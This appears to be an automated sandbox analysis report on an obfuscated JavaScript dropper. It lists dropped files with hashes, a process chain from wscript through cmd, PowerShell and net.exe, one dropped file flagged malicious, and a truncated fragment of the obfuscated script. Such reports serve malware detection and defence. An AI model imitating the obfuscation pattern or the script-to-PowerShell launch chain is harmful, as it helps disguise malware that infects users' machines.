C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.291500900670042 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfbPtdPeUkwRe9:YvXKXe3laZN95GDV8Ukee9 |
MD5: | 03BA3FE1410E2D96725AF2DE30176381 |
SHA1: | F8684F858B73163FA806351043AEC0F5684DB10F |
SHA-256: | 5A02E1AF91A1E13195D10F7917BE21542F7025D244A423E3402F8B413EC68D07 |
SHA-512: | A9164A17E3C1762410ACCB8E6D6F220F04AA72B1793A5146D4ED981316355B64477FD2327B6F484B1A03303AD2CD42562DE2409000FFF74C5EF4CEBFBFE3603E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.290654704308175 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJf21rPeUkwRe9:YvXKXe3laZN95G+16Ukee9 |
MD5: | 6122275CA1F3C7D174F19E716CF5D5E8 |
SHA1: | 062651D46FBE6478F0A4B7F0CE17AB0C1E2DC215 |
SHA-256: | E15413EDA26627E8C5378705C9F2A1EED100AA27DE01560B3091BF8CC35C9BEC |
SHA-512: | 1B0E0D15ACC54AE55D972C063292D3CB6F94D718B6B433560AC48F73BD5AC2C7CB34040D654C630E588BBF6C499A4EAE8CB7361C557F46C622454713858F27C9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.664292573146501 |
Encrypted: | false |
SSDEEP: | 24:Yv6Xe3EZN9CamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS2a:Yv93EZkBgkDMUJUAh8cvM2a |
MD5: | F3AA7097DA993562CC0C68E688CA5465 |
SHA1: | A62DBE1AB9ACA06C4578FD0DF4106A38F139E10D |
SHA-256: | 82937083595E097AC0C93670064F618CAFA77AC016B50A4EA1D12D3C7F848C74 |
SHA-512: | 243DE20F89CBC9EF539368F114525C2D46A373C24A64BE75498D95C1888E4FC3CFBC5F12749D3D2037A5F0ACD734E1E43DD47227BC11EBFA0815441752EB1722 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2664376439494065 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfshHHrPeUkwRe9:YvXKXe3laZN95GUUUkee9 |
MD5: | FDEC63D3579359057FECA452C4F668F7 |
SHA1: | F588F2FB4501C1E602B73923DAC8F74F98081410 |
SHA-256: | BC0EB26A5C85C3B70A0A466135DB29299BA90C5C4995C7A0384B7B7704EE2139 |
SHA-512: | FEDA1C0E1572D7D64565477AFE93232386732ACA67AC82BD3A24ECA49E16E8E9745FA00550AD389FE5FE28E706A1DB6E76810CBCF12152E828FC761711942DFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.280350473455874 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJTqgFCrPeUkwRe9:YvXKXe3laZN95GTq16Ukee9 |
MD5: | 8860A70836184F79E39D421065EC0E36 |
SHA1: | 2B680531EB328D920BE65BB5699C433755590026 |
SHA-256: | D2BE64976B53F23767279F35F7859DEC8D5AA6178E16782BDBA31CCB3F044614 |
SHA-512: | CC154CF3ED34DE5C68D2555557153397ED750324F76E7D968696E465BF6FEF9CBDA871C0A5964075051D97033BD94C200145DEA116031792A3C5C1E96687628D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.130878080482702 |
Encrypted: | false |
SSDEEP: | 48:YJyAeSo131BN2PoVM9OvZUZ9ThcT0WMbGq7b9TY+E7:rx1NVwOh0WMtpW |
MD5: | A1C9BBB2DA9E188893DFE521E4912C21 |
SHA1: | BA7DF597468D53FA94B849A26367A566B363DF6C |
SHA-256: | 767C134C470BA688800963F6D088DB780E0ED1D89AB6F15B05D2EEE9F5A2E381 |
SHA-512: | B20E04804E011D3A941D996E650935DE65F9E95AE1BC6C9016C2781DCE54C7AF5786CC8BB63FC989113B7E8A3F38DE3CF862032BF81EBB933EC948C53A8CFC24 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.365537206833045 |
Encrypted: | false |
SSDEEP: | 48:Tll2GL7msMF6gU9rtPth0Ob1lSvp2AKNe:fVmsMF6v9rtPth0Ob1l0gF8 |
MD5: | BE6DB64E7651F27B55A72F77998B3726 |
SHA1: | 668619339B61C690BE8513EE02B8E2AA397A0A49 |
SHA-256: | 8C29B5089376249CAD6E31238E45EC6C3A2B9E7144F6CD921A55E2E69C130392 |
SHA-512: | 4D0063198B18C50F540C3E4C5167CD46A737EF5F84C3055D80C327635777154C4E4F6D819DB87A8B92BD4A095D7189CAAFE14CBA5B40D832AC43399FEEE3F65C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.8419168775600867 |
Encrypted: | false |
SSDEEP: | 48:7M3+F6gU9rtPth0Ob1lSvp2NKNqOqGufl2GL7msF:7HF6v9rtPth0Ob1l0g8EOKNVmsF |
MD5: | E50C11BA2735B21160AECA1645A776D0 |
SHA1: | E4E499AF037742B9FA320BED2C3582B28A85E724 |
SHA-256: | 5BB73A60325FF45E78ECE753814D457A5A47009844ECE34889E28F1F29BDACCA |
SHA-512: | 9FBADCE4B5D64CE392ED19FB59FC287B535AC2FD51C3B3C25C0A674057E622FFB4E30903CEFCCFBC6D84BFACAA7F8E396E88A0828BA5DA28AF831DDE93638A7F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgosXR+itsOXmGVDgvuNTVCpIt3Yyu:6a6TZ44ADEosYiCOWiLCpIVK |
MD5: | 6848AADC1FE9164432967C95DBEF789C |
SHA1: | 521283377E715D7E08C96BF690BABF1122BEE933 |
SHA-256: | EB938506B1DB6F5E9714BB6615615153AE312789028A90E474CD1E301BF6187C |
SHA-512: | F600B2987C2567E62587DB53D850BD00984805F6D7F6650624EA5E00E9EBA2B289AC8D83CAFCC012944FA4DE49B88A8AF530557718F13AB9B66409873E959D12 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulnmWllZ:NllUmWl |
MD5: | 3EBBEC2F920D055DAC842B4FF84448FA |
SHA1: | 52D2AD86C481FAED6187FC7E6655C5BD646CA663 |
SHA-256: | 32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09 |
SHA-512: | 163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5162684137903053 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClE9v:Qw946cPbiOxDlbYnuRK+bDN |
MD5: | 2F9A5BD64EC5A1F907FEE4D5A720C599 |
SHA1: | 60D836AF4FE70402EE4861B36048046F6118340D |
SHA-256: | 6D59EB46E7CB3FEB119A46FF23C4E75B7B4C7077C617C8A325076B573A94F6E5 |
SHA-512: | 730043BDE701C72CC4872383016A70A5C3441CE21FA8905EC4C3A5712E5985BE11835623B0082E49886AB3DC15317FCDF3F552DF6D2A815B5B8B57BE63619DDD |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 19-23-52-198.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.325555449275219 |
Encrypted: | false |
SSDEEP: | 384:JekpMW7ujsO+Z3k/V1WPGHEQRmpvtV7C36g2OwfBhBUtBX66p0o6V6xG4W7wtNF2:nO2 |
MD5: | 39628FA3AE1A78F558A4947A4847C830 |
SHA1: | 083A80F18FBEA378E9944FF9B6B74FE68CD56D92 |
SHA-256: | E634D52BBCA86894E6CF9CA673A8FA4035AD705990F27198651E88F969FE73AC |
SHA-512: | F488D486C5DA8E071B212070005D5F91E4D06CD8D6E65BBBA1D8D5CE9FE929C8935841A93180297EE8B4F50069F06455850DAFAB1525B2F33797248BEDBF0A69 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.355901802172255 |
Encrypted: | false |
SSDEEP: | 384:BT9uWIPZiX+QnZpU4RE4N389Bu/1dkgyYP04eyezepFL5/um+FnxpqpwxP5Axw4h:sp+ |
MD5: | B2668E9FF609A2F70EE804216C1D4FC2 |
SHA1: | C280B7EA124B4AA8D4F8B13D95807B1E8145B41C |
SHA-256: | C0E3204F88CCF5C7E629D7F7900E99094A43F1898059FC0B1B51DFA018F0A701 |
SHA-512: | 3636F0762CF16C0817EB18945ADB27C2935AF7F0203904F8174B9F6BDC8DEACCD7DD92B46236F144C5D24E9AEC4A196C1DCB3EF7182FC42F43627D903DAD9B9F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.3988654006866295 |
Encrypted: | false |
SSDEEP: | 768:SllhexEhcIWcsRoUh39w7P/t8k+yyUXhSGS:SllhexEhcIWcsRoUh39w7P/t8k+yyUX0 |
MD5: | A4098092B2631AFB375A3CD1D7A70C6C |
SHA1: | F564C22C84D8269A9603B975A4C06CA7260D28B2 |
SHA-256: | 7A5E668B324E10F425AF1D48D44D19A5400A5E70CB6ACDA34BF74C2C2B2856EF |
SHA-512: | 7BA7CF32E2CF032CB2F28FA7026B379720A07F4F3C5DA99DD8B87BB7E4128D289247D7C76963B825EA5E9EEF3BF293D33B96BD769B9274B5CB2926456C0E11E3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7ouWLgGZtwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVuWLgGZtwZGk3mlind9i4ufFXpAXkru |
MD5: | A8E5C37206C98D1B655FF994A420FFB6 |
SHA1: | 827237782AB5971EC205C3BCECCC7950BE9F84C3 |
SHA-256: | F1F755059AF7C2CBC36920337941AEFB18FBDB3CD14D3239CBBBCF0CB8F208EA |
SHA-512: | 12DE33EB7624458AEC44D83D4E2C09E626F8E54E177FC0C26EEBA232935F34FAAAEB71FBB025EB7C53BEA9933C46ADCE759C32516D1B80C03B6734C61D61CEB2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.931501488607017 |
TrID: | |
File name: | 27374120242908411416.js |
File size: | 21'670 bytes |
MD5: | 862d755e3bec36c18cb58d5633d5caf3 |
SHA1: | 20770355ba30be94934b21c899cc271b8d04a5d5 |
SHA256: | 3abba4147ff374fae94a1b58efd4110289eb68616e8f3622a34407510c9a73d3 |
SHA512: | 3fb50c3ea10125249da99898d935ddfbaf58237254c293ef03ca1f5e15cf1afb9cb2dd4c2471758ddbbb0bafd4336676c15c67362177c96c7b4953e802a0acb4 |
SSDEEP: | 384:VkBmjjd+FseEuHsxHAE18BAe1KY6cTvxnf0Uxen/fBgFr:DEQuw8McTJnf3OHqFr |
TLSH: | 05A24405D1EDC69BC8DDF4E861F7A8C5A6F946AB8DC5400AB5020C8494A1A7C3AFD7F8 |
File Content Preview: | function hklkrj(){punpk=[1031,3079,5127,4103,2055,3072];var eyfjh=this[tyasnrv+gwvztdf+kvvihnfu+bglgejx+eekifdd+stkiohn+yamgchm+cjmqzpeg](this[rkdrey+wmfikf+nztfgufm+kvvihnfu+ykgpz+tyasnrv+cjmqzpeg][dilwipyvn+kvvihnfu+eekifdd+gwvztdf+cjmqzpeg+eekifdd+cthv |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 19:23:43 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff706c60000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 19:23:44 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7fd190000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 19:23:44 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff704000000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 19:23:44 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63c0a0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 19:23:48 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff77b230000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 19:23:49 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7fd190000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 19:23:49 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c8450000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 19:23:49 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff763240000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 19:23:49 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d3e90000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 19:23:49 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff763240000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function hklkrj() { |
|
1 | punpk = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
